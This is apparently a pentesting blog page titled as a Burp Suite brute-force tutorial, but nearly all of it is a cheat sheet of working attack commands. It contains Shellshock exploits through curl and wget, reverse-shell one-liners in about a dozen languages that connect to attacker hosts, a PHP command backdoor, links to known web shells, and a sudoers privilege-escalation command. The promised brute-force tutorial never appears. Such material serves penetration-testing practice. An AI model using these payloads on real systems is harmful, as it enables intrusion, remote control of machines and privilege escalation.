Brute force attack with Brup suite

Brute force attack with Brup suite

 

This tutorial will show how to launch a brute force attack with Burp suite and will explain how to use the intruder module to automate the attack on web application.

 

Advertisements

Pentest Killer Commands

Cheat Sheets

Vulnerability assesment

Scanning a webapplication with nikto with proxy configuration.

nikto -host 192.168.xx.xx -userproxy http://192.168.xx.xx:3129

 

Directory Buster with Proxy

Dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan With Proxy

wpscan --url 192.168.XX.XX/dir -proxy 192.168.XX.XX:3128

Curl Commands

Browsing the web page with proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

 

Browse with verbose move:

 curl -v 192.168.37.129 --proxy 192.168.37.129:3128

 

Shell shock exploitation with curl:

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

 

Example:

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

Spawn Shell

Spawn Python TTY Shell :

python -c 'import pty; pty.spawn("/bin/bash")'

 

Spawn Interactive sh shell :

/bin/sh -i

 

Spawn Perl TTY Shell :

exec "/bin/sh"; 

perl e 'exec "/bin/sh";'

 

Spawn Ruby TTY Shell :

exec "/bin/sh"

 

Spawn Shell with vi editor :

:!bash

 

Spawn TTY shell Nmap

!sh

 

Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#

 

Bash:

  1. bash -i > /dev/tcp/ATTSCKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

 

Example:

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

 

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: TCP uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn’t work

 

Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p

 

Example:

nc -e /bin/sh 192.168.37.122 4444

 

Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

 

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

 

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

 

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Python Reverse Shell URL encode format:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

 

Example:

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Gawk:

#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

 

Building a exploit

Cross compile 32 bit binary on 64 bit Linux:

gcc -m32 exploit.c -o exploit

 

Cross compile 32 windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

 

Shell Shock

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

 

Backdoors

PHP:

<?php system($_REQUEST[cmd]); ?>

Shells

DAws.php:

https://github.com/dotcppfile/DAws/blob/master/DAws.php

 

c99:

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

 

b374k shell 3.2

https://github.com/b374k/b374k

 

Privilege escalation 

Cron job update

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>

 

Reference Sites for enumeration 

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

http://www.vulnerabilityassessment.co.uk/nfs.htm

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

 

Reference Links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

 

IP Tables Rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/

 

 

Reference Links: